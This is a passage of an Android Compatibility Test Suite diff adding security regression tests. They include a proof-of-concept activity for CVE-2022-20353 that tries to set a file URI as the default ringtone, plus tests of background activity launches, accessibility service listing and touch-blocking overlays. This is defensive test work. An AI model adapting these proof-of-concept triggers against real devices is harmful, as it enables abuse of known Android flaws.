+ String key) {
+ if (key.equals(mContext.getString(R.string.resultKey))) {
+ preferenceChanged.release();
+ }
+ }
+ };
+ sharedPrefs.registerOnSharedPreferenceChangeListener(sharedPrefListener);
+ // wait for PocActivity to complete
+ assumeTrue(preferenceChanged.tryAcquire(mResources.getInteger(R.integer.timeoutMs),
+ TimeUnit.MILLISECONDS));
+ int result = sharedPrefs.getInt(mContext.getString(R.string.resultKey),
+ mResources.getInteger(R.integer.assumptionFailure));
+ String message = sharedPrefs.getString(mContext.getString(R.string.messageKey),
+ mContext.getString(R.string.defaultSemaphoreMsg));
+ assumeTrue(message, result != mResources.getInteger(R.integer.assumptionFailure));
+
+ String ringtoneUri = "";
+ boolean isVulnerable = false;
+ long startTime = System.currentTimeMillis();
+ while ((System.currentTimeMillis() - startTime) < mResources
+ .getInteger(R.integer.timeoutMs)) {
+ ringtoneUri =
+ mDevice.executeShellCommand(mContext.getString(R.string.getRingtoneCmd));
+ if (ringtoneUri.contains(mContext.getString(R.string.fileName))) {
+ isVulnerable = true;
+ break;
+ }
+ }
+ assertFalse(mContext.getString(R.string.failureMessage), isVulnerable);
+ } catch (Exception e) {
+ assumeNoException(e);
+ } finally {
+ try {
+ // reset ringtone to default (other than 'null') present before test
+ mDevice.executeShellCommand(
+ mContext.getString(R.string.setRingtoneCmd) + " " + defaultRingtone);
+ mDevice.pressHome();
+ } catch (Exception e) {
+ // ignore exception here
+ }
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20353/src/android/security/cts/CVE_2022_20353/PocActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2022-20353/src/android/security/cts/CVE_2022_20353/PocActivity.java
new file mode 100644
index 00000000000..977e647d2e2
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2022-20353/src/android/security/cts/CVE_2022_20353/PocActivity.java
@@ -0,0 +1,62 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2022_20353;
+
+import android.app.Activity;
+import android.content.Context;
+import android.content.Intent;
+import android.content.SharedPreferences;
+import android.media.RingtoneManager;
+import android.net.Uri;
+import android.os.Bundle;
+
+/* PocActivity is required in this test since it is required that CTS PoC app is selected when */
+/* choosing an app for setting default ringtone. RingtonePicker appears due to actions done in */
+/* DeviceTest. */
+public class PocActivity extends Activity {
+
+ @Override
+ protected void onCreate(Bundle savedInstanceState) {
+ try {
+ super.onCreate(savedInstanceState);
+ Intent intent = new Intent();
+ /* set NOTICE.html file uri as EXTRA_RINGTONE_PICKED_URI which sets NOTICE.html as */
+ /* default ringtone if vulnerability is present */
+ intent.putExtra(RingtoneManager.EXTRA_RINGTONE_PICKED_URI,
+ Uri.parse(getString(R.string.noticeUri)));
+ setResult(Activity.RESULT_OK, intent);
+ finish();
+ sendTestResult(getResources().getInteger(R.integer.success), "");
+ } catch (Exception e) {
+ sendTestResult(getResources().getInteger(R.integer.assumptionFailure), e.getMessage());
+ }
+ }
+
+ void sendTestResult(int result, String message) {
+ try {
+ SharedPreferences sh = getSharedPreferences(getString(R.string.sharedPreferences),
+ Context.MODE_PRIVATE);
+ SharedPreferences.Editor edit = sh.edit();
+ edit.putInt(getString(R.string.resultKey), result);
+ edit.putString(getString(R.string.messageKey), message);
+ edit.commit();
+ } catch (Exception e) {
+ // ignore exception here
+ }
+ }
+
+}
diff --git a/tests/accessibility/Android.bp b/tests/accessibility/Android.bp
index 91ce26b6898..03c7d1b85a7 100644
--- a/tests/accessibility/Android.bp
+++ b/tests/accessibility/Android.bp
@@ -21,6 +21,7 @@ java_library_static {
sdk_version: "test_current",
static_libs: [
"compatibility-device-util-axt",
+ "sts-device-util",
],
srcs: ["common/src/**/*.java"],
}
@@ -39,6 +40,7 @@ android_test {
test_suites: [
"cts",
"general-tests",
+ "sts",
],
sdk_version: "test_current",
}
diff --git a/tests/accessibility/AndroidManifest.xml b/tests/accessibility/AndroidManifest.xml
index bf3b1a82567..056ca59ec8a 100644
--- a/tests/accessibility/AndroidManifest.xml
+++ b/tests/accessibility/AndroidManifest.xml
@@ -60,6 +60,17 @@
android:resource="@xml/speaking_and_vibrating_accessibilityservice"/>
</service>
+ <service android:name=".NoFeedbackAccessibilityService"
+ android:label="@string/title_no_feedback_accessibility_service"
+ android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE"
+ android:exported="true">
+ <intent-filter>
+ <action android:name="android.accessibilityservice.AccessibilityService"/>
+ </intent-filter>
+ <meta-data android:name="android.accessibilityservice"
+ android:resource="@xml/no_feedback_accessibilityservice"/>
+ </service>
+
<service android:name=".AccessibilityButtonService"
android:label="@string/title_accessibility_button_service"
android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE"
diff --git a/tests/accessibility/res/values/strings.xml b/tests/accessibility/res/values/strings.xml
index 40c33591b7c..4c8cca9847b 100644
--- a/tests/accessibility/res/values/strings.xml
+++ b/tests/accessibility/res/values/strings.xml
@@ -26,6 +26,9 @@
<!-- String title for the vibrating accessibility service -->
<string name="title_speaking_and_vibrating_accessibility_service">Speaking and Vibrating Accessibility Service</string>
+ <!-- String title for the no-feedback accessibility service -->
+ <string name="title_no_feedback_accessibility_service">No-Feedback Accessibility Service</string>
+
<!-- String title for the accessibility button service -->
<string name="title_accessibility_button_service">Accessibility Button Service</string>
diff --git a/apps/MainlineModuleDetector/AndroidManifest.xml b/tests/accessibility/res/xml/no_feedback_accessibilityservice.xml
index dce1cae6ccc..168e5845031 100644
--- a/apps/MainlineModuleDetector/AndroidManifest.xml
+++ b/tests/accessibility/res/xml/no_feedback_accessibilityservice.xml
@@ -1,5 +1,5 @@
<?xml version="1.0" encoding="utf-8"?>
-<!-- Copyright (C) 2019 The Android Open Source Project
+<!-- Copyright (C) 2022 The Android Open Source Project
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
@@ -13,19 +13,4 @@
See the License for the specific language governing permissions and
limitations under the License.
-->
-
-<manifest xmlns:android="http://schemas.android.com/apk/res/android"
- package="com.android.cts.mainlinemoduledetector"
- android:versionCode="1"
- android:versionName="1.0">
-
- <application>
- <activity android:name=".MainlineModuleDetector"
- android:exported="true">
- <intent-filter>
- <action android:name="android.intent.action.MAIN"/>
- <category android:name="android.intent.category.LAUNCHER"/>
- </intent-filter>
- </activity>
- </application>
-</manifest>
+<accessibility-service xmlns:android="http://schemas.android.com/apk/res/android"/>
diff --git a/tests/accessibility/src/android/view/accessibility/cts/AccessibilityManagerTest.java b/tests/accessibility/src/android/view/accessibility/cts/AccessibilityManagerTest.java
index f1eab6cdfc5..5f9d5013564 100644
--- a/tests/accessibility/src/android/view/accessibility/cts/AccessibilityManagerTest.java
+++ b/tests/accessibility/src/android/view/accessibility/cts/AccessibilityManagerTest.java
@@ -34,6 +34,7 @@ import android.app.UiAutomation;
import android.content.Context;
import android.content.pm.ServiceInfo;
import android.os.Handler;
+import android.platform.test.annotations.AsbSecurityTest;
import android.view.accessibility.AccessibilityEvent;
import android.view.accessibility.AccessibilityManager;
import android.view.accessibility.AccessibilityManager.AccessibilityStateChangeListener;
@@ -42,6 +43,8 @@ import android.view.accessibility.AccessibilityManager.TouchExplorationStateChan
import androidx.test.InstrumentationRegistry;
import androidx.test.runner.AndroidJUnit4;
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
import com.android.compatibility.common.util.PollingCheck;
import com.android.compatibility.common.util.SystemUtil;
@@ -59,7 +62,7 @@ import java.util.concurrent.atomic.AtomicBoolean;
* Class for testing {@link AccessibilityManager}.
*/
@RunWith(AndroidJUnit4.class)
-public class AccessibilityManagerTest {
+public class AccessibilityManagerTest extends StsExtraBusinessLogicTestCase {
private AccessibilityDumpOnFailureRule mDumpOnFailureRule =
new AccessibilityDumpOnFailureRule();
@@ -77,9 +80,15 @@ public class AccessibilityManagerTest {
new InstrumentedAccessibilityServiceTestRule<>(
SpeakingAndVibratingAccessibilityService.class, false);
+ private InstrumentedAccessibilityServiceTestRule<NoFeedbackAccessibilityService>
+ mNoFeedbackAccessibilityServiceRule =
+ new InstrumentedAccessibilityServiceTestRule<>(
+ NoFeedbackAccessibilityService.class, false);
+
@Rule
public final RuleChain mRuleChain = RuleChain
.outerRule(mSpeakingAndVibratingAccessibilityServiceRule)
+ .around(mNoFeedbackAccessibilityServiceRule)
.around(mVibratingAccessibilityServiceRule)
.around(mSpeakingAccessibilityServiceRule)
// Inner rule capture failure and dump data before finishing activity and a11y service
@@ -97,6 +106,9 @@ public class AccessibilityManagerTest {
private static final String MULTIPLE_FEEDBACK_TYPES_ACCESSIBILITY_SERVICE_NAME =
"android.view.accessibility.cts.SpeakingAndVibratingAccessibilityService";
+ private static final String NO_FEEDBACK_ACCESSIBILITY_SERVICE_NAME =
+ "android.view.accessibility.cts.NoFeedbackAccessibilityService";
+
public static final String ACCESSIBILITY_NON_INTERACTIVE_UI_TIMEOUT_MS =
"accessibility_non_interactive_ui_timeout_ms";
@@ -202,6 +214,26 @@ public class AccessibilityManagerTest {
assertTrue("The vibrating service should be enabled.", vibratingServiceEnabled);
}
+ @AsbSecurityTest(cveBugId = {243849844})
+ @Test
+ public void testGetEnabledAccessibilityServiceList_NoFeedback() {
+ mNoFeedbackAccessibilityServiceRule.enableService();
+ List<AccessibilityServiceInfo> enabledServices =
+ mAccessibilityManager.getEnabledAccessibilityServiceList(
+ AccessibilityServiceInfo.FEEDBACK_ALL_MASK);
+ boolean noFeedbackServiceEnabled = false;
+ final int serviceCount = enabledServices.size();
+ for (int i = 0; i < serviceCount; i++) {
+ AccessibilityServiceInfo enabledService = enabledServices.get(i);
+ ServiceInfo serviceInfo = enabledService.getResolveInfo().serviceInfo;
+ if (mTargetContext.getPackageName().equals(serviceInfo.packageName)
+ && NO_FEEDBACK_ACCESSIBILITY_SERVICE_NAME.equals(serviceInfo.name)) {
+ noFeedbackServiceEnabled = true;
+ }
+ }
+ assertTrue("The no-feedback service should be enabled.", noFeedbackServiceEnabled);
+ }
+
@Test
public void testGetEnabledAccessibilityServiceListForType() throws Exception {
mSpeakingAccessibilityServiceRule.enableService();
diff --git a/tests/accessibility/src/android/view/accessibility/cts/NoFeedbackAccessibilityService.java b/tests/accessibility/src/android/view/accessibility/cts/NoFeedbackAccessibilityService.java
new file mode 100644
index 00000000000..0c79ae41515
--- /dev/null
+++ b/tests/accessibility/src/android/view/accessibility/cts/NoFeedbackAccessibilityService.java
@@ -0,0 +1,29 @@
+/*
+ * Copyright (C) 2012 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.view.accessibility.cts;
+
+import android.accessibility.cts.common.InstrumentedAccessibilityService;
+import android.content.ComponentName;
+
+/**
+ * Stub accessibility service that reports itself as providing no feedback.
+ */
+public class NoFeedbackAccessibilityService extends InstrumentedAccessibilityService {
+ public static final ComponentName COMPONENT_NAME = new ComponentName(
+ "android.view.accessibility.cts",
+ "android.view.accessibility.cts.NoFeedbackAccessibilityService");
+}
diff --git a/tests/framework/base/windowmanager/AndroidManifest.xml b/tests/framework/base/windowmanager/AndroidManifest.xml
index 287e67cb003..97c6d9734cc 100644
--- a/tests/framework/base/windowmanager/AndroidManifest.xml
+++ b/tests/framework/base/windowmanager/AndroidManifest.xml
@@ -461,6 +461,10 @@
<activity android:name="android.server.wm.WindowInputTests$TestActivity" />
+ <activity android:name="android.server.wm.ActivityRecordInputSinkTestsActivity"
+ android:theme="@android:style/Theme.Material.NoActionBar"
+ android:exported="true"/>
+
<service android:name="android.view.cts.surfacevalidator.LocalMediaProjectionService"
android:foregroundServiceType="mediaProjection"
android:enabled="true">
diff --git a/tests/framework/base/windowmanager/backgroundactivity/AppA/AndroidManifest.xml b/tests/framework/base/windowmanager/backgroundactivity/AppA/AndroidManifest.xml
index c0180004009..d4de7b1e804 100755
--- a/tests/framework/base/windowmanager/backgroundactivity/AppA/AndroidManifest.xml
+++ b/tests/framework/base/windowmanager/backgroundactivity/AppA/AndroidManifest.xml
@@ -48,5 +48,7 @@
<activity android:name=".PipActivity"
android:exported="true"
android:supportsPictureInPicture="true"/>
+ <activity android:name=".VirtualDisplayActivity"
+ android:exported="true"/>
</application>
</manifest>
diff --git a/tests/framework/base/windowmanager/backgroundactivity/AppA/src/android/server/wm/backgroundactivity/appa/VirtualDisplayActivity.java b/tests/framework/base/windowmanager/backgroundactivity/AppA/src/android/server/wm/backgroundactivity/appa/VirtualDisplayActivity.java
new file mode 100644
index 00000000000..5461305f2d0
--- /dev/null
+++ b/tests/framework/base/windowmanager/backgroundactivity/AppA/src/android/server/wm/backgroundactivity/appa/VirtualDisplayActivity.java
@@ -0,0 +1,37 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.server.wm.backgroundactivity.appa;
+
+import android.app.Presentation;
+import android.hardware.display.DisplayManager;
+import android.hardware.display.VirtualDisplay;
+import android.os.Bundle;
+
+public class VirtualDisplayActivity extends RelaunchingActivity {
+
+ @Override
+ protected void onCreate(Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+ createVirtualDisplayAndShowPresentation();
+ }
+
+ private void createVirtualDisplayAndShowPresentation() {
+ VirtualDisplay virtualDisplay = getSystemService(DisplayManager.class).createVirtualDisplay(
+ "VirtualDisplay1", 10, 10, 10, null, 0);
+ new Presentation(getBaseContext(), virtualDisplay.getDisplay()).show();
+ }
+}
diff --git a/tests/framework/base/windowmanager/backgroundactivity/src/android/server/wm/BackgroundActivityLaunchTest.java b/tests/framework/base/windowmanager/backgroundactivity/src/android/server/wm/BackgroundActivityLaunchTest.java
index d46e9224395..65e4d715003 100644
--- a/tests/framework/base/windowmanager/backgroundactivity/src/android/server/wm/BackgroundActivityLaunchTest.java
+++ b/tests/framework/base/windowmanager/backgroundactivity/src/android/server/wm/BackgroundActivityLaunchTest.java
@@ -97,6 +97,9 @@ public class BackgroundActivityLaunchTest extends ActivityManagerTestBase {
public static final ComponentName APP_A_PIP_ACTIVITY =
new ComponentName(TEST_PACKAGE_APP_A,
"android.server.wm.backgroundactivity.appa.PipActivity");
+ public static final ComponentName APP_A_VIRTUAL_DISPLAY_ACTIVITY =
+ new ComponentName(TEST_PACKAGE_APP_A,
+ "android.server.wm.backgroundactivity.appa.VirtualDisplayActivity");
private static final String SHELL_PACKAGE = "com.android.shell";
/**
@@ -547,6 +550,24 @@ public class BackgroundActivityLaunchTest extends ActivityManagerTestBase {
assertActivityNotResumed();
}
+ // Check that a presentation on a virtual display won't allow BAL after pressing home.
+ @Test
+ public void testVirtualDisplayCannotStartAfterHomeButton() throws Exception {
+ Intent intent = new Intent();
+ intent.setComponent(APP_A_VIRTUAL_DISPLAY_ACTIVITY);
+ intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ mContext.startActivity(intent);
+
+ assertTrue("VirtualDisplay activity not started", waitUntilForegroundChanged(
+ TEST_PACKAGE_APP_A, true, ACTIVITY_START_TIMEOUT_MS));
+
+ // Click home button, and test app activity onPause() will trigger which tries to launch
+ // the background activity.
+ pressHomeAndWaitHomeResumed();
+
+ assertActivityNotResumed();
+ }
+
private void pressHomeAndWaitHomeResumed() {
pressHomeButton();
mWmState.waitForHomeActivityVisible();
diff --git a/tests/framework/base/windowmanager/overlayappbase/AndroidManifest.xml b/tests/framework/base/windowmanager/overlayappbase/AndroidManifest.xml
index 3a608dc366e..40910d7ecb4 100644
--- a/tests/framework/base/windowmanager/overlayappbase/AndroidManifest.xml
+++ b/tests/framework/base/windowmanager/overlayappbase/AndroidManifest.xml
@@ -19,22 +19,29 @@
package="android.server.wm.overlay">
<!-- We use SAWs to create obscuring windows for test WindowUntrustedTouchTest -->
- <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" />
+ <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
<application>
<service
android:name="android.server.wm.overlay.UntrustedTouchTestService"
- android:exported="true" />
+ android:exported="true"/>
<activity
android:name="android.server.wm.overlay.OverlayActivity"
android:theme="@android:style/Theme.Translucent"
- android:exported="true" />
+ android:exported="true"/>
<activity
android:name="android.server.wm.overlay.ExitAnimationActivity"
- android:exported="true" />
+ android:exported="true"/>
<activity
android:name="android.server.wm.overlay.ToastActivity"
- android:exported="true" />
+ android:exported="true"/>
+ <activity
+ android:name="android.server.wm.overlay.TrampolineActivity"
+ android:exported="true"/>
+ <activity
+ android:name="android.server.wm.overlay.TranslucentFloatingActivity"
+ android:theme="@style/TranslucentFloatingTheme"
+ android:exported="true"/>
</application>
</manifest>
diff --git a/tests/framework/base/windowmanager/overlayappbase/res/anim/fade.xml b/tests/framework/base/windowmanager/overlayappbase/res/anim/fade.xml
new file mode 100644
index 00000000000..be65f81cd29
--- /dev/null
+++ b/tests/framework/base/windowmanager/overlayappbase/res/anim/fade.xml
@@ -0,0 +1,20 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!-- Copyright (C) 2008 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+
+<alpha xmlns:android="http://schemas.android.com/apk/res/android"
+ android:fromAlpha="1.0"
+ android:toAlpha="0.0"
+ android:duration="3000" />
diff --git a/tests/framework/base/windowmanager/overlayappbase/res/values/styles.xml b/tests/framework/base/windowmanager/overlayappbase/res/values/styles.xml
new file mode 100644
index 00000000000..fd7ccc2ea3c
--- /dev/null
+++ b/tests/framework/base/windowmanager/overlayappbase/res/values/styles.xml
@@ -0,0 +1,23 @@
+<!--
+ ~ Copyright (C) 2018 The Android Open Source Project
+ ~
+ ~ Licensed under the Apache License, Version 2.0 (the "License");
+ ~ you may not use this file except in compliance with the License.
+ ~ You may obtain a copy of the License at
+ ~
+ ~ http://www.apache.org/licenses/LICENSE-2.0
+ ~
+ ~ Unless required by applicable law or agreed to in writing, software
+ ~ distributed under the License is distributed on an "AS IS" BASIS,
+ ~ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ ~ See the License for the specific language governing permissions and
+ ~ limitations under the License.
+ -->
+
+<resources>
+ <style name="TranslucentFloatingTheme" >
+ <item name="android:windowIsTranslucent">true</item>
+ <item name="android:windowIsFloating">true</item>
+ <item name="android:windowNoTitle">true</item>
+ </style>
+</resources>
diff --git a/tests/framework/base/windowmanager/overlayappbase/src/android/server/wm/overlay/Components.java b/tests/framework/base/windowmanager/overlayappbase/src/android/server/wm/overlay/Components.java
index beff6c1ac1c..499d590b616 100644
--- a/tests/framework/base/windowmanager/overlayappbase/src/android/server/wm/overlay/Components.java
+++ b/tests/framework/base/windowmanager/overlayappbase/src/android/server/wm/overlay/Components.java
@@ -17,6 +17,7 @@
package android.server.wm.overlay;
import android.content.ComponentName;
+import android.os.Bundle;
import android.server.wm.component.ComponentsBase;
@@ -51,6 +52,33 @@ public class Components extends ComponentsBase {
ComponentName COMPONENT = component("ToastActivity");
}
+ public interface TranslucentFloatingActivity {
+ String ACTION_FINISH =
+ "android.server.wm.overlay.TranslucentFloatingActivity.ACTION_FINISH";
+ String EXTRA_FADE_EXIT =
+ "android.server.wm.overlay.TranslucentFloatingActivity.ACTION_FINISH_FADE_EXIT";
+ ComponentName BASE_COMPONENT = component("TranslucentFloatingActivity");
+ static ComponentName getComponent(String packageName) {
+ return new ComponentName(packageName, BASE_COMPONENT.getClassName());
+ }
+ }
+
+ public interface TrampolineActivity {
+ ComponentName BASE_COMPONENT = component("TrampolineActivity");
+ String COMPONENTS_EXTRA = "components_extra";
+
+ static ComponentName getComponent(String packageName) {
+ return new ComponentName(packageName, BASE_COMPONENT.getClassName());
+ }
+
+ static Bundle buildTrampolineExtra(ComponentName... componentNames) {
+ Bundle trampolineTarget = new Bundle();
+ trampolineTarget.putParcelableArray(COMPONENTS_EXTRA, componentNames);
+ return trampolineTarget;
+ }
+
+ }
+
private static ComponentName component(String className) {
return component(Components.class, className);
}
diff --git a/tests/framework/base/windowmanager/overlayappbase/src/android/server/wm/overlay/TrampolineActivity.java b/tests/framework/base/windowmanager/overlayappbase/src/android/server/wm/overlay/TrampolineActivity.java
new file mode 100644
index 00000000000..a7be8babd27
--- /dev/null
+++ b/tests/framework/base/windowmanager/overlayappbase/src/android/server/wm/overlay/TrampolineActivity.java
@@ -0,0 +1,41 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.server.wm.overlay;
+
+import android.app.Activity;
+import android.content.ComponentName;
+import android.content.Intent;
+import android.os.Bundle;
+import android.os.Parcelable;
+
+public class TrampolineActivity extends Activity {
+
+ @Override
+ protected void onCreate(Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+ Parcelable[] componentNames = getIntent().getParcelableArrayExtra(
+ Components.TrampolineActivity.COMPONENTS_EXTRA);
+ for (Parcelable parcel : componentNames) {
+ ComponentName componentName = (ComponentName) parcel;
+ Intent intent = new Intent();
+ intent.setComponent(componentName);
+ startActivity(intent);
+ }
+ finish();
+ }
+
+}
diff --git a/tests/framework/base/windowmanager/overlayappbase/src/android/server/wm/overlay/TranslucentFloatingActivity.java b/tests/framework/base/windowmanager/overlayappbase/src/android/server/wm/overlay/TranslucentFloatingActivity.java
new file mode 100644
index 00000000000..e6249acc87d
--- /dev/null
+++ b/tests/framework/base/windowmanager/overlayappbase/src/android/server/wm/overlay/TranslucentFloatingActivity.java
@@ -0,0 +1,63 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.server.wm.overlay;
+
+import android.app.Activity;
+import android.content.BroadcastReceiver;
+import android.content.Context;
+import android.content.Intent;
+import android.content.IntentFilter;
+import android.graphics.Color;
+import android.os.Bundle;
+import android.view.Gravity;
+import android.view.WindowManager;
+import android.widget.LinearLayout;
+
+public class TranslucentFloatingActivity extends Activity {
+
+ @Override
+ protected void onCreate(Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+
+ LinearLayout tv = new LinearLayout(this);
+ tv.setBackgroundColor(Color.GREEN);
+ tv.setPadding(50, 50, 50, 50);
+ tv.setGravity(Gravity.CENTER);
+ setContentView(tv);
+
+ getWindow().addFlags(WindowManager.LayoutParams.FLAG_NOT_TOUCH_MODAL);
+ getWindow().clearFlags(WindowManager.LayoutParams.FLAG_DIM_BEHIND);
+
+ registerReceiver(mReceiver,
+ new IntentFilter(Components.TranslucentFloatingActivity.ACTION_FINISH));
+ }
+
+ private final BroadcastReceiver mReceiver = new BroadcastReceiver() {
+ @Override
+ public void onReceive(Context context, Intent intent) {
+ if (Components.TranslucentFloatingActivity.ACTION_FINISH.equals(intent.getAction())) {
+ unregisterReceiver(this);
+ finish();
+ if (intent.getBooleanExtra(
+ Components.TranslucentFloatingActivity.EXTRA_FADE_EXIT, false)) {
+ overridePendingTransition(0, R.anim.fade);
+ }
+ }
+ }
+ };
+
+}
diff --git a/tests/framework/base/windowmanager/src/android/server/wm/ActivityRecordInputSinkTests.java b/tests/framework/base/windowmanager/src/android/server/wm/ActivityRecordInputSinkTests.java
new file mode 100644
index 00000000000..14aada1c1c1
--- /dev/null
+++ b/tests/framework/base/windowmanager/src/android/server/wm/ActivityRecordInputSinkTests.java
@@ -0,0 +1,190 @@
+/*
+ * Copyright (C) 2019 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.server.wm;
+
+import static android.server.wm.WindowManagerState.STATE_PAUSED;
+import static android.server.wm.WindowManagerState.STATE_RESUMED;
+import static android.server.wm.overlay.Components.TranslucentFloatingActivity.ACTION_FINISH;
+import static android.server.wm.overlay.Components.TranslucentFloatingActivity.EXTRA_FADE_EXIT;
+
+import static com.google.common.truth.Truth.assertThat;
+
+import android.content.ComponentName;
+import android.content.Intent;
+import android.graphics.Rect;
+import android.os.Bundle;
+import android.platform.test.annotations.Presubmit;
+import android.server.wm.overlay.Components;
+
+import androidx.annotation.Nullable;
+
+import org.junit.After;
+import org.junit.Before;
+import org.junit.Test;
+
+/**
+ * Build/Install/Run:
+ * atest CtsWindowManagerDeviceTestCases:ActivityRecordInputSinkTests
+ */
+@Presubmit
+public class ActivityRecordInputSinkTests extends ActivityManagerTestBase {
+
+ private static final String APP_SELF =
+ WindowUntrustedTouchTest.class.getPackage().getName() + ".cts";
+ private static final String APP_A =
+ android.server.wm.second.Components.class.getPackage().getName();
+
+ private static final ComponentName TEST_ACTIVITY =
+ new ComponentName(APP_SELF, "android.server.wm.ActivityRecordInputSinkTestsActivity");
+
+ private static final ComponentName OVERLAY_IN_SAME_UID =
+ Components.TranslucentFloatingActivity.getComponent(APP_SELF);
+ private static final ComponentName OVERLAY_IN_DIFFERENT_UID =
+ Components.TranslucentFloatingActivity.getComponent(APP_A);
+ private static final ComponentName TRAMPOLINE_DIFFERENT_UID =
+ Components.TrampolineActivity.getComponent(APP_A);
+
+ private int mTouchCount;
+
+ @Before
+ public void setUp() {
+ ActivityRecordInputSinkTestsActivity.sButtonClickCount.set(0);
+ }
+
+ @After
+ public void tearDown() {
+ stopTestPackage(APP_A);
+ }
+
+ @Test
+ public void testOverlappingActivityInNewTask_BlocksTouches() {
+ launchActivity(TEST_ACTIVITY);
+ touchButtonsAndAssert(true /*expectTouchesToReachActivity*/);
+
+ launchActivityInNewTask(OVERLAY_IN_SAME_UID);
+ mWmState.waitAndAssertActivityState(OVERLAY_IN_SAME_UID, STATE_RESUMED);
+ touchButtonsAndAssert(false /*expectTouchesToReachActivity*/);
+
+ mContext.sendBroadcast(new Intent(Components.TranslucentFloatingActivity.ACTION_FINISH));
+ mWmState.waitAndAssertActivityRemoved(OVERLAY_IN_SAME_UID);
+ touchButtonsAndAssert(true /*expectTouchesToReachActivity*/);
+ }
+
+ @Test
+ public void testOverlappingActivityInSameTaskSameUid_DoesNotBlocksTouches() {
+ launchActivity(TEST_ACTIVITY);
+ touchButtonsAndAssert(true /*expectTouchesToReachActivity*/);
+
+ launchActivityInSameTask(OVERLAY_IN_SAME_UID);
+ mWmState.waitAndAssertActivityState(OVERLAY_IN_SAME_UID, STATE_RESUMED);
+ touchButtonsAndAssert(true /*expectTouchesToReachActivity*/);
+ }
+
+ @Test
+ public void testOverlappingActivityInSameTaskDifferentUid_DoesNotBlocksTouches() {
+ launchActivity(TEST_ACTIVITY);
+ touchButtonsAndAssert(true /*expectTouchesToReachActivity*/);
+
+ launchActivityInSameTask(OVERLAY_IN_DIFFERENT_UID);
+ mWmState.waitAndAssertActivityState(OVERLAY_IN_DIFFERENT_UID, STATE_RESUMED);
+ mWmState.assertActivityDisplayed(OVERLAY_IN_DIFFERENT_UID);
+ touchButtonsAndAssert(true /*expectTouchesToReachActivity*/);
+ }
+
+ @Test
+ public void testOverlappingActivityInSameTaskTrampolineDifferentUid_DoesNotBlockTouches() {
+ launchActivity(TEST_ACTIVITY);
+ touchButtonsAndAssert(true /*expectTouchesToReachActivity*/);
+
+ launchActivityInSameTask(TRAMPOLINE_DIFFERENT_UID,
